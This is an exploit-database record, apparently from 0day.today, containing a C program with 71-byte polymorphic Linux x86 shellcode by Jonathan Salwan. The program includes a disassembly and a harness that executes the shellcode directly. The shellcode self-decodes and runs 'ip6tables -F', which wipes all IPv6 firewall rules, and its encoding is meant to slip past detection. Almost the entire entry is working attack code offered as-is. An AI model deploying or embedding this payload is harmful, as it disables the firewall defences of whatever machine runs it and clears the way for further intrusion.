linux/x86 polymorphic shellcode ip6tables -F

{"type": "zdt", "lastseen": "2016-04-20T02:22:44", "bulletinFamily": "exploit", "cvelist": [], "history": [], "title": "linux/x86 polymorphic shellcode ip6tables -F - 71 bytes", "published": "2010-01-24T00:00:00", "href": "http://0day.today/exploit/description/10169", "cvss": {"vector": "NONE", "score": 0}, "description": "Exploit for linux/x86 platform in category shellcode", "hash": "0019c4d385be333b56324717b35e523ca9b551fcb28c73942cd8a3a1247d949a", "references": [], "objectVersion": "1.0", "edition": 1, "sourceData": "=======================================================\r\nlinux/x86 polymorphic shellcode ip6tables -F - 71 bytes\r\n=======================================================\r\n\r\n\r\n/* Linux x86 - polymorphic shellcode ip6tables -F - 71 bytes\r\n * Jonathan Salwan \r\n *\r\n *\r\n * The Gnuser Project (Gnu Users Manager) => http://www.gnuser.org\r\n *\r\n * Disassembly of section .text:\r\n *\r\n * 08048054 <.text>:\r\n * 8048054: 6a 0b push $0xb\r\n * 8048056: 58 pop %eax\r\n * 8048057: 99 cltd \r\n * 8048058: 52 push %edx\r\n * 8048059: 66 68 2d 46 pushw $0x462d\r\n * 804805d: 89 e1 mov %esp,%ecx\r\n * 804805f: 52 push %edx\r\n * 8048060: 6a 73 push $0x73\r\n * 8048062: 66 68 6c 65 pushw $0x656c\r\n * 8048066: 68 36 74 61 62 push $0x62617436\r\n * 804806b: 68 6e 2f 69 70 push $0x70692f6e\r\n * 8048070: 68 2f 73 62 69 push $0x6962732f\r\n * 8048075: 68 2f 75 73 72 push $0x7273752f\r\n * 804807a: 89 e3 mov %esp,%ebx\r\n * 804807c: 52 push %edx\r\n * 804807d: 51 push %ecx\r\n * 804807e: 53 push %ebx\r\n * 804807f: 89 e1 mov %esp,%ecx\r\n * 8048081: cd 80 int $0x80\r\n*/\r\n \r\n#include <stdio.h>\r\n \r\nint main(int argc, char *argv[])\r\n{\r\nchar shellcode[] = \"\\xeb\\x11\\x5e\\x31\\xc9\\xb1\\x47\\x80\"\r\n \"\\x6c\\x0e\\xff\\x01\\x80\\xe9\\x01\\x75\"\r\n \"\\xf6\\xeb\\x05\\xe8\\xea\\xff\\xff\\xff\"\r\n \"\\x6b\\x0c\\x59\\x9a\\x53\\x67\\x69\\x2e\"\r\n \"\\x47\\x8a\\xe2\\x53\\x6b\\x74\\x67\\x69\"\r\n \"\\x6d\\x66\\x69\\x37\\x75\\x62\\x63\\x69\"\r\n \"\\x6f\\x30\\x6a\\x71\\x69\\x30\\x74\\x63\"\r\n \"\\x6a\\x69\\x30\\x76\\x74\\x73\\x8a\\xe4\"\r\n \"\\x53\\x52\\x54\\x8a\\xe2\\xce\\x81\";\r\n \r\n fprintf(stdout,\"Length: %d\\n\",strlen(shellcode));\r\n (*(void(*)()) shellcode)(); \r\n}\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "id": "1337DAY-ID-10169", "sourceHref": "http://0day.today/exploit/10169", "modified": "2010-01-24T00:00:00", "reporter": "Jonathan Salwan", "enchantments": {"vulnersScore": 4.6}}